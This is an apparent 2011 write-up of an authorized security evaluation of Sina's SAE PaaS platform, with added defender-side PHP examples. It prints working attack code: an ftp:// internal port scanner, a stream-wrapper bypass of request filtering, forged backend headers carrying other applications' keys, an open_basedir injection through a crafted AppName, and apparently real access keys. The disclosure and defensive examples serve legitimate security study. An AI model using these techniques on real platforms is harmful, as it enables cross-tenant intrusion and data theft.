A Brief Discussion of Cloud Security, Based on an Authorized Security Evaluation of SAE


 

[Directory]

1. Background and description

2. What is Cloud

3. What is cloud security?

4. How to Design cloud security

5. An authorized security evaluation test for SAE

 

1. Background and description

 

Because access to our overseas servers was slow and often failed, we had long been working with SAE to migrate the WooYun project to the stable SAE platform. Later we also established security cooperation with Sina SAE, including this security evaluation test. On the other hand, most industry discussion of cloud security stays at the theoretical level. Many experts, scholars, security researchers, and hackers discuss cloud security, but there are few cases of evaluating, analyzing, or even intruding into a cloud in an actual production environment. 80sec has always had its own thoughts on cloud security, but without an actual case we had not produced any documentation. Now that SAE has fixed these security problems, and with SAE's agreement, this evaluation of a typical PaaS cloud can be made public. Along the way we offer some of 80sec's preliminary ideas on cloud security. The detailed security issues will also be submitted to the WooYun vulnerability reporting platform; doing security is better than talking about security :)

 

2. What is Cloud

 

We understand cloud as a new way of using resources, including storage, data, computing, networks, and so on. Compared with traditional resources, these are closer to a basic utility that can be used as much as needed, elastic like water and electricity in infrastructure, and billed by usage. So far it is difficult to give the cloud a precise definition. From a security perspective, we can only roughly divide clouds into:

 

Private cloud: a cloud that serves internal business and provides unlimited computing and storage capabilities;

Public cloud: a cloud that provides services to external users. On top of unlimited computing and storage capabilities, it may also combine the company's core resources and serve external users in the form of SaaS;

 

Similarly, by actual form and function, cloud can be divided into IaaS, PaaS, and SaaS. These types of cloud resources differ in essence, and each layer serves the one above it: IaaS provides fine-grained division of network and system resources; PaaS relies on IaaS to open storage, computing, data, and other resources to third-party developers; SaaS, delivered as software, can be combined with the company's core resources to provide services to users;

 

3. What is cloud security?

 

Security is always about data. The essence of security is data security, including availability, confidentiality, and resistance to tampering. One challenge is that the cloud essentially changes how data is processed: security responsibility moves from the data owner alone to the data processor and the data owner together.

Another challenge cloud security brings is a contradiction. As a user, if I want to use the cloud, I may be transmitting sensitive data to it, so I must first be sure the cloud is secure. As a cloud builder responsible for cloud security, I must first determine how data is processed and shared in the cloud, but that is hard to do while data volumes and concrete applications are still immature. I cannot protect a system whose threat model is immature. As a result, cloud security currently runs ahead of cloud computing, yet because cloud computing services are underdeveloped, cloud security remains at the level of theory and policy;

Different clouds face different security threats because their business objectives and data differ. For example, what PaaS must consider is completely different from what IaaS must consider. Likewise, the security objectives of private clouds are completely different from those of public clouds. As 80sec said a long time ago, security without an understanding of context is meaningless;

 

4. How to Design cloud security

 

I believe that the security of anything is determined by the following aspects: the value inherent in it, the risks that value attracts, whether there are protections and practical solutions that take those risks into account, whether the solutions are correctly implemented, and whether, once they are correctly implemented, an effective system exists for management and O&M. A gap in any link leads to insecurity;

We believe there is no uniform cloud security that fits every cloud, so we choose a typical example, PaaS, to present our simple views on cloud security design. We consider the following aspects:

 

A) Asset value: we need to understand the core value of the business. Data of different value brings different security threats. For example, we do not recommend running private servers (you know), banking systems, and the like on PaaS. PaaS is not suitable for them, and introducing high-value assets increases the risk to the cloud;

 

B) Security risks: a website involving state secrets faces different security risks from a personal blog. Analyze the possible risks, such as denial of service, illegal access to user data, and penetration of internal networks;

 

C) Threat modeling: based on the risks the cloud may face and the channels through which they may arise, analyze the system architecture, the security domains, and the boundaries between security domains, and build a threat model. For example, at the boundary between the PaaS cloud platform and the Internet, consider network attacks and malicious scanning from the Internet; at the boundary between user data and platform data, consider malicious code acting against platform data, and even the boundary between PaaS users; in addition, consider the platform's impact on the internal data center;

 

D) Security policy: based on the threat model above, define the security policies needed to prevent or weaken each threat. For example, deploy a firewall at the PaaS cloud boundary, deploy intrusion detection and monitoring between the platform and the internal network, and implement security isolation between the platform and users and between users;

 

E) Technical control: implementing specific policies is both difficult and important. Most enterprises lack technical assessment of this part and do not have enough technical support, so their security policies remain empty words. This part should at least include security baselines, access control, and exception monitoring.

 

Our security design is therefore driven by data and risk. Taking Sina cloud SAE as an example, we can divide the data involved into several security zones by attribute and security level, with security controls implemented in each zone. Access between zones must be strictly monitored and audited:

 

A) Sina internal data (in Sina IDC; unauthorized access to Sina internal data would cause harm)

B) SAE platform data (the platform underpins the security of all user data, so its security level is high)

C) SAE user data (which can be further refined into user data A and user data B)

 

These zones have completely different attributes, and different access controls are required between them. Internal data should be completely isolated from the platform itself; this can be controlled by dividing independent networks. In theory we trust the internal network, but if the platform is important enough, its internal access and requests can be isolated as well. Platform data should be completely isolated from users. This part lives on hosts and some background services, so it can be controlled on the network and through a sandbox on the host. Data of different users is at the same security level but still needs to be isolated, which requires an isolation mechanism at the application layer. For the boundary between the platform and the Internet, we need to defend strictly against DoS and DDoS attacks and against common application vulnerabilities;

If any of these parts is not done properly, security issues will occur. Whether implementing or evaluating, we consider these aspects;

 

5. An authorized security evaluation test for SAE

 

Our website is already built on the SAE platform, which is very good in terms of speed, stability, and the staff's attitude toward problems. SAE and WooYun had earlier intended to cooperate, including on security evaluation and testing of SAE. SAE was well protected, and it responded positively to the problems we found and repaired them. With SAE's permission, we share some of those problems here. We believe this will be helpful for other PaaS-like platforms.

 

1. Know it: understand our testing objectives

 

According to our rough analysis of Sina cloud, the data is divided into Sina internal data, SAE platform data, and SAE user data. Sina internal data mainly refers to other business data in the IDC; platform data includes platform management, O&M, and related business data; user data mainly refers to data uploaded to SAE, including code, databases, and storage. According to our security goals, these kinds of data should be isolated from one another, should not affect one another, and should not be accessed illegally;

Sina's cloud protection falls into several aspects. The external firewall implements the control boundary between SAE and the Internet, and appropriate internal ACLs protect internal data. What we care most about is the aspect unique to PaaS: the isolation between user data and the cloud platform, which is the most complex and flexible part. SAE isolates user data mainly by user name and password. Different applications are isolated by access_key and secret_key; access to backend databases, storage, and other services must provide access_key and secret_key. Isolation between user data and the platform mainly rests on the rule that all resources must be used through interfaces provided by SAE. At the code execution layer, SAE simulates a sandbox environment through disable_functions and open_basedir, so that at run time the sandbox ensures users cannot access data other than their own resources;

We can see that SAE has put great effort into this area, and this is where we tried to break through;

 

2. Check the available resources.

 

The only way we can really interact with SAE, and with the rich resources of other users held in the SAE backend, is to execute our own code. The environment our code runs in and the actual restrictions on it are therefore very important to us. We use the following code to examine the system:

 

 

<?php
// List every function this script may call: user-defined functions
// plus internal functions that are not listed in disable_functions.
$exts = get_loaded_extensions();
$disables = ini_get("disable_functions");
$disables = array_map('trim', explode(",", $disables));

$alls = get_defined_functions();

$myfun = $alls['user'];

for ($i = 0; $i < count($alls['internal']); $i++) {
    if (!in_array($alls['internal'][$i], $disables)) {
        $myfun[] = $alls['internal'][$i];
    }
}

var_dump($myfun);
?>

 

This is the full executable scope of our code, that is, all the possible interactions. As you can see, it includes functions and methods that we already know can break through the sandbox's restrictions;

 

3. Analyze our environment

 

We can also see that SAE supports the phpinfo function, so we can assess the current environment through phpinfo. We need to look at the following items:

 

 

Registered PHP Streams

apache2handler

Apache Environment

open_basedir

disable_functions

auto_prepend_file

 

In this way we roughly understand the runtime environment of our code, and the auto_prepend_file setting points us to some of what SAE does at the application layer. Many secrets are hidden there, including how the backend services work and possible gaps in the sandbox SAE built. After all, this is security control implemented at the same layer as our code rather than at a lower layer. It mainly consists of the encapsulation of network requests and of backend resource access, which is where access_key and secret_key come into play;

 

4. Attack methods

 

Our code runs in an open_basedir and disable_functions environment. These two options normally isolate our code from the file system and the operating system, leaving us in a restricted environment. In addition, because SAE's PHP-layer code runs before ours, a sandbox is also implemented at the PHP code layer. In this sandbox our interaction with any other resource, such as HTTP requests and socket requests, is restricted. For connections that are normally allowed, such as MySQL, our tests found that because the underlying MySQL code has been modified, we cannot connect to any data beyond our own permissions from the SAE code execution environment. However, SAE chose to build the sandbox at the application layer rather than at a lower layer. Therefore, if we can find places the sandbox does not control, we may bypass it; and if the sandbox itself is not implemented well, problems may also occur.

First, let's see whether the sandbox itself may be vulnerable. Simply traversing the allowed PHP functions, we found that one function, mb_send_mail, is not disabled. 80sec once recommended disabling the mail function because it is an interface through which PHP interacts with the underlying system, and mb_send_mail is a wrapper around the mail function. A simple test showed that the function could indeed be used to read and write on the underlying system. However, for network reasons we got a 500 error and the results we wanted were not returned to us, but SAE has confirmed that this problem does exist.

In addition, we observed that SAE supports a large number of streams, but only the http protocol is actually encapsulated. The purpose of the encapsulation is to control user requests, for example to restrict the target addresses and to control the number of requests more precisely. The native ftp protocol, for example, has no such restriction, so we can use it to build a simple intranet port scanner:

 

 

echo(file_get_contents('ftp://127.0.0.1:22/111'));

 

Because SAE's error reporting is very developer-friendly, we can tell whether the network is unreachable, the port is not open, or the protocol does not match. In this way we can even probe the degree of isolation between SAE and the internal network.

The ftp protocol, after all, is not very convenient. As for the encapsulated http protocol, we found that stream_wrapper_unregister and stream_wrapper_restore are not disabled. With these two functions we can restore native http requests and send an http request anywhere we want:

 

 

// Drop the platform's http wrapper, then bring back PHP's built-in one.
if (in_array("http", stream_get_wrappers())) {
    stream_wrapper_unregister("http");
}

stream_wrapper_restore("http");
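A defender-side check for the gaps found so far (mail and mb_send_mail, the unwrapped ftp wrapper, stream_wrapper_unregister and stream_wrapper_restore, and phpinfo). This is an added example, not code from the original article or from SAE; the `$wrappedByPlatform` parameter and the sample configuration are assumptions constructed for illustration.

```php
<?php
// Added example: checks a PHP configuration for the sandbox gaps named in the article.
// Not SAE code; the sample configuration at the bottom is constructed.

/**
 * @param string   $disableFunctions  value of the disable_functions ini setting
 * @param string[] $wrappers          registered wrappers, as from stream_get_wrappers()
 * @param string[] $wrappedByPlatform wrappers the platform replaced with its own class (assumption)
 * @return string[] one finding per gap
 */
function audit_sandbox(string $disableFunctions, array $wrappers, array $wrappedByPlatform): array
{
    // Function names are case-insensitive in PHP, so compare in lower case.
    $disabled = array_map('trim', explode(',', strtolower($disableFunctions)));

    $risky = [
        'mail'                      => 'passes data to the system mailer',
        'mb_send_mail'              => 'wrapper around mail()',
        'stream_wrapper_unregister' => 'tenant code can drop the platform http wrapper',
        'stream_wrapper_restore'    => 'tenant code can bring back the native http wrapper',
        'phpinfo'                   => 'shows request headers and server paths to the tenant',
    ];

    $findings = [];
    foreach ($risky as $fn => $why) {
        if (!in_array($fn, $disabled, true)) {
            $findings[] = "function $fn is callable: $why";
        }
    }

    // Wrappers that open network connections; only those the platform wraps are filtered.
    foreach (['http', 'https', 'ftp', 'ftps'] as $w) {
        if (in_array($w, $wrappers, true) && !in_array($w, $wrappedByPlatform, true)) {
            $findings[] = "wrapper $w:// is registered but not wrapped by the platform";
        }
    }
    return $findings;
}

// Constructed sample resembling the situation in the article.
$sampleDisable  = 'exec, system, passthru, shell_exec, popen, proc_open, mail';
$sampleWrappers = ['https', 'ftps', 'php', 'file', 'glob', 'data', 'http', 'ftp'];

foreach (audit_sandbox($sampleDisable, $sampleWrappers, ['http']) as $finding) {
    echo $finding, PHP_EOL;
}

// On a live runtime: audit_sandbox(ini_get('disable_functions'), stream_get_wrappers(), ['http']);
```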

 

This only breaks through the network request sandbox. At the actual user data layer, we found that users share some basic backend services, such as memcache and mysql, and the backend identifies the user by the access_key and secret_key the user passes. We ran an interesting experiment:

 

 

// Connection settings of the application
define('SAE_ACCESSKEY', 'm0lm3wyxjyo');
define('SAE_SECRETKEY', '5d2dmz1xwyihjd2m3xzximw5wj30jix0djxl1c5i0iz5');
define('SAE_MYSQL_HOST_M', 'w.rdc.sae.sina.com.cn');
define('SAE_MYSQL_HOST_S', 'r.rdc.sae.sina.com.cn');
define('SAE_MYSQL_PORT', 3307);
define('SAE_MYSQL_USER', SAE_ACCESSKEY);
define('SAE_MYSQL_PASS', SAE_SECRETKEY);
define('SAE_MYSQL_DB', 'app_' . 'wscan');

// Try a direct database connection from application code
var_dump(mysql_connect('r.rdc.sae.sina.com.cn:000000', 'm0lm3wyxjyo', 'weight'));

 

This prompts:

 

SAE_Warning: mysql_connect() [function.mysql-connect]: this app is not authorised in eval.php

 

It seems the underlying MySQL restricts which application may connect and does not allow cross-application database connections. However, we know that databases can be connected to not only from the application code environment but also from the control panel SAE provides. The control panel connects in the background using access_key and secret_key, so we only need to substitute the keys we have obtained for another application to connect successfully. This sandbox seems too simple and still does not enforce the principle that an application can access only its own data. So how do we get someone else's access_key and secret_key? Looking at the auto_prepend_file file, these two values are passed in from the HTTP request, and for implementation reasons they can be seen directly in phpinfo. Search Baidu for sae and phpinfo ......

We now seem to understand some of SAE's mechanisms, but all of this is between users. We were curious why SAE needs to pass access_key and secret_key in the HTTP headers, which seems hard to understand. After analyzing SAE's implementation, our understanding is as follows. After receiving a request, the front end makes some logical judgments about it, for example whether the application is valid and whether it has exceeded its resource limits. Once this validation is complete, the request is forwarded to the backend execution layer, and data the execution environment needs, such as access_key and secret_key, is passed to the execution environment at this point. The advantage is that the execution environment is only responsible for execution and does not need to verify the validity of the request; changes to any application, such as disabling, enabling, or deleting it, do not affect the backend execution environment. But there is an obvious problem: if the validity of the request is verified only by the front end, then being able to send a request directly to the backend may undermine the correctness of the backend logic. Note the following information in phpinfo:

 

 

DOCUMENT_ROOT /data1/www/htdocs

SERVER_ADMIN saesupport@sina.cn

SCRIPT_FILENAME /data1/www/htdocs/549/wscan/1/phpinfo.php

 

We requested phpinfo.php, and DOCUMENT_ROOT is /data1/www/htdocs. In theory that request could not map to /data1/www/htdocs/549/wscan/1/phpinfo.php. From this path we guess that the code of all applications lives under /data1/www/htdocs/ and that all of it runs under the same user identity. For some reason SAE was not designed to isolate the executable code of different users; isolation is implemented only at the execution layer, through dynamic mapping and dynamic restrictions. Is there any problem with this mechanism? See the following code:

 

 

// Restore the native http wrapper, as before.
if (in_array("http", stream_get_wrappers())) {
    stream_wrapper_unregister("http");
}

stream_wrapper_restore("http");

// Headers that the front end normally sets when it forwards a request.
$opt = array(
    'http' => array(
        'header' => "Host: Drivers\r\nX-Forwarded-For: 61.135.165.180, drivers\r\nAppName: webmanage\r\nAccessKey: ynz0jyo1k1\r\nSecretKey: export\r\nAppHash: 928\r\nMysqlPort: 3307\r\nAppCookie: default_version=1;xhprof=;debug=1;\r\nConnection: close\r\nCookie: saeut=220.181.50.244.1321955942519836\r\nAppVersion: 1",
        'protocol_version' => '1.1'
    )
);
stream_context_set_default($opt);
$d = stream_context_get_default();
var_dump(file_get_contents("http://10.67.15.23/phpinfo.php"));

 

Using the earlier way around the http encapsulation, we made a native http request and sent it directly to the backend execution layer. We intentionally used someone else's appname and apphash to request a phpinfo. The results show that, as we guessed, the request path and the request restrictions are all generated dynamically, based on appname and apphash, for example:

 

 

SCRIPT_FILENAME /data1/www/htdocs/549/wscan/1/phpinfo.php
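One way a back end can refuse requests that did not pass the front end's checks is to require a keyed signature over the forwarded identity headers. This is an added example, not SAE's mechanism or code from the article; the X-FE-Time and X-FE-Sig headers, the shared key, and all demo values are hypothetical, and it assumes the check runs before any tenant code with a key that tenant code cannot read.

```php
<?php
// Added example, not SAE code. AppName, AppHash, AccessKey and AppVersion are the
// forwarded headers shown in the article; X-FE-Time, X-FE-Sig and the shared key
// are hypothetical.

const FE_MAX_SKEW = 30; // seconds a signed request stays acceptable

function fe_canonical(array $h): string
{
    // Fixed field order; length prefixes stop one value from bleeding into the next.
    $out = '';
    foreach (['AppName', 'AppHash', 'AccessKey', 'AppVersion', 'X-FE-Time'] as $name) {
        $value = (string)($h[$name] ?? '');
        $out .= strlen($value) . ':' . $value . "\n";
    }
    return $out;
}

// Front end: called after the application has passed its validity and quota checks.
function fe_sign(array $h, string $key, int $now): array
{
    $h['X-FE-Time'] = (string)$now;
    $h['X-FE-Sig']  = hash_hmac('sha256', fe_canonical($h), $key);
    return $h;
}

// Back end: refuse to execute anything the front end did not vouch for.
function be_accept(array $h, string $key, int $now): bool
{
    $sig  = (string)($h['X-FE-Sig'] ?? '');
    $time = (string)($h['X-FE-Time'] ?? '');
    if ($sig === '' || !preg_match('/\A[0-9]{1,12}\z/', $time)) {
        return false;
    }
    if (abs($now - (int)$time) > FE_MAX_SKEW) {
        return false;
    }
    // Constant-time comparison of the expected and the presented signature.
    return hash_equals(hash_hmac('sha256', fe_canonical($h), $key), $sig);
}

// Constructed demo values.
$key = 'constructed-demo-key';
$now = 1324339200;
$signed = fe_sign(
    ['AppName' => 'demoapp', 'AppHash' => '123', 'AccessKey' => 'demo-ak', 'AppVersion' => '1'],
    $key,
    $now
);

$handWritten = ['AppName' => 'otherapp', 'AppHash' => '456', 'AccessKey' => 'x', 'AppVersion' => '1'];
$tampered = $signed;
$tampered['AppName'] = 'otherapp';

var_dump(be_accept($signed, $key, $now + 2));      // request that came through the front end
var_dump(be_accept($handWritten, $key, $now + 2)); // sent straight to the execution layer
var_dump(be_accept($tampered, $key, $now + 2));    // signed request with AppName swapped
```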

 

The request path is determined by the requested apphash and appname together with DOCUMENT_ROOT. Seen this way, the resources of all users are more like different pages under the same site, so in theory other users' resources can be obtained, and we tried to go further. Since the request path is generated dynamically, we have reason to believe that open_basedir is generated dynamically as well. And since it is generated dynamically, we can perform an unprecedented injection:

 

open_basedir format: /dir/1:/dir/2

 

If we can produce an open_basedir of the form /dir/1://dir/2, we can break through the file system sandbox. At the same time the request must be valid, because the requested file must match this path. We can create a directory named "/://" and combine it with ../ directory traversal to satisfy both open_basedir and SCRIPT_FILENAME. Finally, we construct the following request:

 

 

// Restore the native http wrapper, as before.
if (in_array("http", stream_get_wrappers())) {
    stream_wrapper_unregister("http");
}

stream_wrapper_restore("http");

// Same forwarded headers, with the open_basedir separator placed in AppName.
$opt = array(
    'http' => array(
        'header' => "Host: wooyun.sinaapp.com\r\nX-Forwarded-For: 61.135.165.180, 61.135.165.180\r\nAppName: webmanage/1/:/:/../../../\r\nAccessKey: ynztttt1k1\r\nSecretKey: encrypt\r\nAppHash: 928\r\nMysqlPort: 3307\r\nAppCookie: default_version=1;xhprof=;debug=1;\r\nConnection: close\r\nCookie: saeut=220.181.50.244.1321955942519836\r\nAppVersion: 1",
        'protocol_version' => '1.1'
    )
);
stream_context_set_default($opt);
$d = stream_context_get_default();
var_dump(file_get_contents("http://10.67.15.23/phpinfo.php"));

 

Note AppName: webmanage/1/:/:/../../../. With this, all requests in webmanage bypass the open_basedir restriction. We successfully accessed the code resources of all users, including the resources in the SAE platform execution environment;

After obtaining data access, we tried to break out into the SAE system environment and found some problems, but made no real breakthrough. We will share those when there is an opportunity :)
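Why the colon matters, and the check that stops it: the sketch below builds the application directory from the forwarded identifiers, once unchecked and once after allow-list validation. It is an added example, not SAE's code; the DOCUMENT_ROOT/AppHash/AppName/AppVersion layout follows the SCRIPT_FILENAME shown above, while the function names and identifier rules are assumptions.

```php
<?php
// Added example, not SAE code. The layout DOCUMENT_ROOT/AppHash/AppName/AppVersion
// follows the SCRIPT_FILENAME shown in the article; the identifier rules are assumptions.

// Naive: header values are pasted into the path unchecked.
function app_dir_naive(string $root, string $hash, string $name, string $ver): string
{
    return "$root/$hash/$name/$ver";
}

// open_basedir is a list: PHP splits it on PATH_SEPARATOR (':' on Unix),
// and every piece becomes an allowed location.
function basedir_entries(string $openBasedir): array
{
    return explode(':', $openBasedir);
}

// Checked: identifiers must match a strict allow-list before any path is built,
// so neither the list separator, a path separator, nor ".." can appear.
function app_dir_checked(string $root, string $hash, string $name, string $ver): string
{
    if (!preg_match('/\A[0-9]{1,6}\z/', $hash)
        || !preg_match('/\A[a-z0-9]{1,32}\z/', $name)
        || !preg_match('/\A[0-9]{1,4}\z/', $ver)) {
        throw new InvalidArgumentException('illegal application identifier');
    }
    // Trailing slash so that .../1 cannot also match .../10 where the entry is treated as a prefix.
    return "$root/$hash/$name/$ver/";
}

$root = '/data1/www/htdocs';
$fromArticle = 'webmanage/1/:/:/../../../'; // AppName value from the article's request

// One intended directory turns into several open_basedir entries.
print_r(basedir_entries(app_dir_naive($root, '928', $fromArticle, '1')));

// The same identifiers through the checked builder: the plain name passes, the other is refused.
foreach (['webmanage', $fromArticle] as $name) {
    try {
        echo app_dir_checked($root, '928', $name, '1'), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $name, PHP_EOL;
    }
}
```

With the naive builder, one of the resulting entries is the bare root directory, which is what removes the file system restriction; the same validated identifiers should be used for both SCRIPT_FILENAME and open_basedir.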

 

5. Summary

 

Security was taken into account in the design of SAE, and the protection is very strict. It strikes an elegant balance between ease of use and security. But we can also see that in PaaS design, because user code should be allowed to run as conveniently and efficiently as possible, problems easily arise in the implementation details of some security policies. Given the particular context of PaaS applications, other PaaS vendors should pay more attention to these security issues during design and implementation, to avoid security losses to platforms and users.

 

EMail: jianxin # 80sec.com

Site: http://www.80sec.com

Date: 2011-12-20

From: http://www.80sec.com/
